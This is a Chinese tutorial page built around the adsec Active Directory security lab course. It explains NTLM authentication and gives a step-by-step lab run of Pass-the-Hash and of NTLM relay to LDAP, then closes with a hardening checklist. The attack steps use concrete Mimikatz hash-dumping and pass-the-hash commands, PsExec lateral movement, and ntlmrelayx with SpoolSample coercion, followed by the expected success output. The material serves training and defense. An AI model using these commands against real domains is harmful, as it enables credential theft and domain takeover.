完整指南:adsec 从零跑通 NTLM 哈希攻击
完整指南adsec 从零跑通 NTLM 哈希攻击【免费下载链接】adsecAn introduction to Active Directory security项目地址: https://gitcode.com/gh_mirrors/ad/adsec一次深夜应急响应取证工程师翻了整夜日志结论是这台服务器没人输入过密码却有一个新进程以管理员身份在跑唯一的线索是内存里一串 32 位的十六进制字符串。这串东西就是 NTLM 哈希。adsec 是一套开源的 Active Directory 安全攻防实战课程它的第二个练习就能在可控的域环境里复现这条哈希当密码用的完整攻击链。adsec 是给谁用的帮你验证什么adsec 是一门从零出发的 AD 安全课理论课件slides/AD-Security-101.pdf、环境搭建指南本地 3 台虚拟机建域或用 Terraform 一键上云见 lab-setup/README.md、外加exercises/下 8 个按难度排序的攻防练习。它面向刚开始 AD 安全、想先懂协议再动手的人。攻击工具全部打包在 exercises/attacker-tools/ 的压缩包里解压密码 infected不用自己到处找。NTLM 三步握手谁发起、经过什么、得到什么NTLM 认证本质是一场三回合问答服务器随机出题客户端拿密码哈希作答服务器自己算一遍比对。先记住三个高频词Challenge服务器质询数服务器当场生成的 8 或 16 字节随机数防止旧答案被重复使用。NTHashNT 哈希密码的 MD4 摘要16 字节。可以理解为按在密码上的一枚印章明文全程不出网。Response质询应答哈希与质询数运算后的结果服务器用同一套运算比对。关键特性就藏在第 ⑤ 步服务器验证的是这个哈希能否算出正确答案而不是对方是否真的知道密码。所以只要手里有哈希就能替对方作答——这是一切哈希滥用攻击的根源。哈希存放在两处被拿走的时机完全不同存储位置存的是谁的哈希攻击者什么时候拿到SAM 数据库单台机器的本地账户拿到该机本地管理员权限之后NTDS.dit整个域的所有账户需要域管或目录服务恢复模式权限NTLMv1 与 NTLMv2 一张表对比两个版本的差别在应答怎么算直接决定它能不能被离线破解对比项NTLMv1NTLMv2服务器质询长度8 字节16 字节客户端自带随机数没有有应答是否带时间/目标上下文否是离线破解难度弱可用彩虹表高很多v1 的应答只依赖 8 字节质询不带任何上下文截获后可离线爆破或重放v2 里混入了客户端随机数和时间戳拦截的代价大得多。v1 应该在任何环境直接禁用没有讨论空间。两条最常被滥用的哈希攻击链 Pass-the-Hash把偷来的哈希直接当钥匙卡场景一台机器已被控制而两台机器的本地管理员密码还是一样的中小企业太常见了。攻击者全程不需要明文密码只需要哈希。adsec 的练习环境刻意让 adsec-00 和 adsec-01 共用同一个本地管理员密码就是为了复现这个典型隐患。第一步用 Mimikatz 把本地账户哈希倒出来三行命令需管理员权限运行privilege::debug token::elevate lsadump::sam第二步用哈希直接开 Shell再用 PsExec 连向下一台机器sekurlsa::pth /user:Administrator /ntlm:32位哈希 /domain:doesnotmatter PsExec64.exe \\adsec-01 cmd远端 Shell 里whoami返回 CONTOSO\administrator 即成功。排错提示如果lsadump::sam报错九成是进程没有提升权限——右键命令提示符选以管理员身份运行再执行。 NTLM Relay中转站不检查卡是谁的PtH 是自己用卡Relay 是把受害者的卡拿过来插到更有价值的门里。问题在于 NTLM 握手时服务器不校验这次认证最初是发给谁的它只验证答案对不对。攻击者就在中间当一次快递中转让受害者先认证给自己再把整个会话原样转发给域控的 LDAP。难点只有一个让受害者主动来敲门。常用强制认证入口有 MS-RPRN 打印协议SpoolSample、MS-EFSRPCPetitPotam、WebDAV。项目的第三个练习详见 exercises/3-NTLM-Relay.md走完了全链路先用 Powermad 创建 evilpc$ 计算机账户再启动中继ntlmrelayx.py --no-smb-server --delegate-access --escalate-user evilpc$ -t ldap://adsec-dc.contoso.com最后用 SpoolSample 逼 adsec-01 发起一次打印认证SpoolSample.exe adsec-01 adsec-0080/foobar成功时中继控制台会输出[*] Authenticating against ldap://adsec-dc.contoso.com as CONTOSO\adsec-01$ SUCCEED [*] Delegation rights modified succesfully!你得到的是那台机器的资源基于约束委派RBCD权限——也就是第六个练习 Kerberos RBCD 攻击的入场券。最小实战路径环境 → 命令 → 预期输出环境先克隆课程仓库拿到搭建脚本git clone https://gitcode.com/gh_mirrors/ad/adsec再按 lab-setup/README.md 本地建 3 台虚拟机adsec-dc 两台成员或用 Terraform 上云依次执行create-domain.ps1和domainprepare.ps1得到带用户、组和 OU 的测试域。工具解压 exercises/attacker-tools/ 下的两个压缩包密码 infectedMimikatz、PsExec、impacket、SpoolSample 全在里面。最短路径练习 2 的哈希提取与横向移动 → 远端whoami回显目标机管理员 → 练习 3 的中继链 → 控制台出现 SUCCEED 与 Delegation rights modified。两个练习串起来约一小时。排错如果 ntlmrelayx 一直等不到连接先确认 adsec-01 的 135 端口RPC能从攻击机打通域默认防火墙通常要先放开——这是最常见的失败原因。NTLM 加固五件事按优先级做优先级措施可验证的效果1组策略LAN 管理器身份验证级别设为仅发送 NTLMv2 响应并开启 SMB 签名v1 降级与中继同时消失2部署 LAPS每台机器本地管理员密码独立随机一张偷来的哈希只能开一台机器3修补 MS-RPRN / MS-EFSRPC 强制认证漏洞用 RPC 过滤器拦截敲门通道少一类4对 IIS、Exchange 等支持的服务启用 EPA扩展保护认证绑定 TLS 通道无法在别处重放5限制 NTLM组策略先审计再拒绝认证尽量迁往 KerberosNTLM 攻击面逐步收缩下一步先做完练习 2 和 3并亲手回答练习 2 末尾的思考题NTLM 能否彻底禁用为什么然后继续exercises/4-Kerberos-Roasting.md——理解了哈希滥用你就能看懂 Kerberos 为什么也有票据攻击。【免费下载链接】adsecAn introduction to Active Directory security项目地址: https://gitcode.com/gh_mirrors/ad/adsec创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻

Java大厂面试:HashMap与DDD深度解析

Java大厂面试:HashMap与DDD深度解析

1. 项目概述:一场Java大厂面试的技术深度对话去年冬天,我作为面试官参与了公司的一场高级Java工程师招聘。当那位候选人从HashMap底层实现一路聊到DDD架构设计时,我突然意识到——这正是一次典型的Java技术栈深度考察。现在,我就把…

2026/8/25 8:59:59 阅读更多 →
SQL Server磁盘I/O错误溯源与硬件故障诊断指南

SQL Server磁盘I/O错误溯源与硬件故障诊断指南

1. 这不是SQL Server的Bug,而是磁盘底层在向你喊救命 “SQL Server:偏移量为 0x0000000009c000 的位置执行读取期间,操作系统已经向 SQL Server 返回了错误”——这条报错第一次砸在我面前时,我正盯着凌晨三点的监控大屏&#xff…

2026/8/25 8:59:59 阅读更多 →
RPCS3 PS3模拟器汉化配置指南:3步让界面变成中文

RPCS3 PS3模拟器汉化配置指南:3步让界面变成中文

RPCS3 PS3模拟器汉化配置指南:3步让界面变成中文 【免费下载链接】rpcs3 PlayStation 3 emulator and debugger 项目地址: https://gitcode.com/GitHub_Trending/rp/rpcs3 PS3模拟器RPCS3的菜单默认是英文的,翻译文件不知道往哪放、语言在哪切换&…

2026/8/25 8:59:59 阅读更多 →

最新新闻

不点击鼠标也能通过MouseEvent实现点击事件

不点击鼠标也能通过MouseEvent实现点击事件

文章目录事件系统的本质:发布-订阅模式为什么可以“伪造”点击事件?1. 统一的事件处理接口2. Event 对象的标准化3. 事件流的确定性深入 MouseEvent 的实现细节构造函数参数解析与 element.click() 的差异对比真实模拟完整点击序列在一个普通的网页上&am…

2026/8/25 10:22:56 阅读更多 →
前端常用加密方式使用

前端常用加密方式使用

文章目录1、Base64 编码2、MD5 加密3、SHA-256 加密4、AES 对称加密(常用)5、RSA 非对称加密(常用)6、什么是对称和非对称加密7、什么是哈希算法1. 核心特征2. 常见算法3. 前端/网络中的典型用途4. 不是加密1、Base64 编码 Base6…

2026/8/25 10:22:56 阅读更多 →
量化交易数据源选型指南:从Tushare到QMT的OpenClaw实战

量化交易数据源选型指南:从Tushare到QMT的OpenClaw实战

1. 项目概述:量化交易的数据基石之战做量化交易,第一步也是最关键的一步,就是“找数据”。这就像盖房子打地基,地基不牢,后面无论策略模型多精妙,回测曲线多漂亮,都可能是空中楼阁。最近在折腾O…

2026/8/25 10:22:56 阅读更多 →
量化交易数据源选型与混合架构实战:从Tushare到QMT的OpenClaw集成

量化交易数据源选型与混合架构实战:从Tushare到QMT的OpenClaw集成

1. 项目概述:量化交易的数据基石之战做量化交易,第一步也是最关键的一步,就是搞定数据。没有高质量、稳定、及时的数据,再精妙的策略也只是空中楼阁。最近在折腾OpenClaw这个开源量化智能体框架,想用它来搭建一个自动化…

2026/8/25 10:22:56 阅读更多 →
微信小程序webview postmessage通信指南

微信小程序webview postmessage通信指南

需求概述 在微信小程序中使用 web-view 组件与内嵌网页通信时,网页可以通过 wx.miniProgram.postMessage 向小程序发送消息,小程序通过 web-view 的 bindmessage 接收。该接口仅支持网页向小程序发送消息;小程序向网页传参通常使用 URL 参数…

2026/8/25 10:22:56 阅读更多 →
AI Agent混合集群路由器的设计与实现:统一调度OpenClaw与Hermes

AI Agent混合集群路由器的设计与实现:统一调度OpenClaw与Hermes

1. 项目缘起:当两个AI Agent“军团”需要协同作战时最近在折腾AI Agent的落地应用,很多团队都面临一个现实问题:手头可能同时运行着不止一套Agent系统。比如,我们团队内部就同时维护着基于OpenClaw和基于Hermes的两套Agent集群。O…

2026/8/25 10:21:50 阅读更多 →

日新闻

洛谷 P7912:[CSP-J 2021 T4] 小熊的果篮 ← 双向链表

洛谷 P7912:[CSP-J 2021 T4] 小熊的果篮 ← 双向链表

【题目来源】 https://www.luogu.com.cn/problem/P7912 【题目描述】 小熊的水果店里摆放着一排 n 个水果。每个水果只可能是苹果或桔子,从左到右依次用正整数 1,2,…,n 编号。连续排在一起的同一种水果称为一个“块”。小熊要把这一排水果挑到若干个果篮里&#x…

2026/8/25 0:00:34 阅读更多 →
Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG

Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG

Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG 【免费下载链接】transformers.js State-of-the-art Machine Learning for the web. Run 🤗 Transformers directly in your browser, with no need for a server! 项目地址: https:/…

2026/8/25 0:00:34 阅读更多 →
数学建模竞赛论文写作指南:从模型构建到学术表达的核心技能

数学建模竞赛论文写作指南:从模型构建到学术表达的核心技能

1. 项目概述:从“会做”到“会写”的竞赛核心跃迁“全国大学生数学建模竞赛”,这个名字对理工科学生来说,分量极重。每年,无数团队在三天三夜的时间里,为一个开放性问题绞尽脑汁,从建立模型、求解算法到编程…

2026/8/25 0:00:34 阅读更多 →

周新闻

[光学原理与应用-521]:对光的错误理解与纠偏

[光学原理与应用-521]:对光的错误理解与纠偏

首先光是一种能量的载体和形态,宏观上观察到的光是由无数个微观的光量子组成的,每个光子在产生的瞬间,其在真空的空间中以确定不变的速度沿着一个初始的方向一直向前,在微观层面,每个光量子的运动轨迹是以波函数所展现…

2026/8/25 3:38:12 阅读更多 →
SIP通话转接原理与REFER方法实战解析

SIP通话转接原理与REFER方法实战解析

1. 通话转接不是“挂断再拨号”,而是SIP会话的动态重定向你有没有遇到过这样的场景:客服坐席A正在和客户通电话,突然需要把这通对话无缝转给专家坐席B,客户完全感知不到中间的断连——既没听到忙音,也没被要求重新拨号…

2026/8/25 3:38:18 阅读更多 →
Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

1. 为什么选择Kolla-ansible来部署单节点OpenStack?如果你正在寻找一种能把OpenStack从“概念”快速变成“可用的实验环境”的方法,那么Kolla-ansible几乎是当前最主流、最省心的选择。我见过太多人卡在手动编译依赖、配置服务、处理版本冲突的泥潭里&am…

2026/8/25 3:38:23 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/24 20:22:44 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/23 12:10:44 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/24 11:20:22 阅读更多 →